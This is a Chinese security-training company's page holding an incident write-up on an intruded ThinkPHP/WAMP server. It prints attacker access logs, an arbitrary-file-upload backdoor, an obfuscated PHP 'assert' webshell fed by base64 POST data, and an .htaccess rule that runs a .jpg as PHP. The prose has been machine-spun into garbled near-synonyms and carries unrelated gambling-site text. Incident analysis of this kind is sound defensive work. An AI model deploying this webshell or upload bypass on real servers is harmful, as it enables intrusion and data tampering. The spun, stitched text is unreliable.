天创培训:您身旁的信息安全培训专家!
www.00mm8332.com
栏目列表
开班方案
2019年1月CISP培训开班告诉
主讲教师   张教师、王教师等
开课工夫   2019年1月8日-13日
培训方法   实地/面授
讲课天次   培训5天+测验半天
上课工夫   09:00 -- 16:30
课程引见 在线报名
金沙澳门88128cc
手艺中心您当前位置: > 资本专区 > 手艺中心

一次服务器被入侵后的一些步伐

作者:天创培训  滥觞:px.tcnet.com.cn  更新工夫:2016-09-05  关键词:服务器,入侵

情况:wamp 套件. 2003体系 安装安全狗套件。

 

法式:thinkphp 自定义开辟法式...外买的。

 

业务员反响背景有人乱删除数据,疑心让入侵。

 

随即登上服务器检察日记...

 

经由过程检察日记:锁定可疑IP:45.127.97.180  香港...

 

45.127.97.180 - - [16/Mar/2016:08:49:29 +0800] "GET /Public/uploadify.php HTTP/1.1" 200 969 //检察服务器能否存在uploadify.php 

45.127.97.180 - - [16/Mar/2016:08:49:43 +0800] "GET /Public/ HTTP/1.1" 403 209

45.127.97.180 - - [16/Mar/2016:08:49:47 +0800] "GET /Public/file.php HTTP/1.1" 404 1118

45.127.97.180 - - [16/Mar/2016:08:50:20 +0800] "POST /Public/uploadify.php HTTP/1.1" 200 -

45.127.97.180 - - [16/Mar/2016:08:50:29 +0800] "POST /Public/uploadify.php HTTP/1.1" 200 -

45.127.97.180 - - [16/Mar/2016:08:50:38 +0800] "GET /Public/lib.jpg HTTP/1.1" 200 1599

uploadify.php //后门上传文件

 

 

$file=$_FILES['Filedata'];

$path = isset($_REQUEST['path'])&&!empty($_REQUEST['path'])?daddslashes($_REQUEST['path']):'';

if(!$file['tmp_name']||!$file['name']||!$file['size']){

    return false;

}

$path=!empty($path)&&'/'!=substr($path,-1,1)?$path.'/':$path;

$save_name=addslashes($file['name']);

if(!move_uploaded_file($file['tmp_name'],$path.$save_name)){

    WriteErrMsg('文件上传历程中发作毛病,请从头上传');

}

上传lib.jpg 文件

 

复制代码

if(isset($_REQUEST['newuserid'])){ 

$i[0] = 'asse'.'rt'; 

$array[] = $i; 

$key=str_replace("yBZ","",$_POST['ad']);

$i[1]=base64_decode($key);

$array[0][0]($i[1]);

}

复制代码

 考虑jpg文件如何可以施行,httpd.conf .htaccess配置文件

 

存在htaccess  由于存在随便文件上传,过狗的一句话很有可能爆途径,上传.htacccess撑持jpg 将于php法式运转。

 

<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>

 



0

推荐浏览

 |  关于天创 |  课程体系 |  最新动态 |  联络我们 |  网站舆图 |  二维码
版权所有:江苏天创科技有限公司 苏ICP备16028135号-2
姑苏总部地址:江苏省苏州市十梓街327号 电话:0512-65129087 传真:0512-65157410 邮编:215000
南京分公司地址:南京珠江路88号新世界中心A座 电话:025-84533276 传真:025-84533286 邮编:210000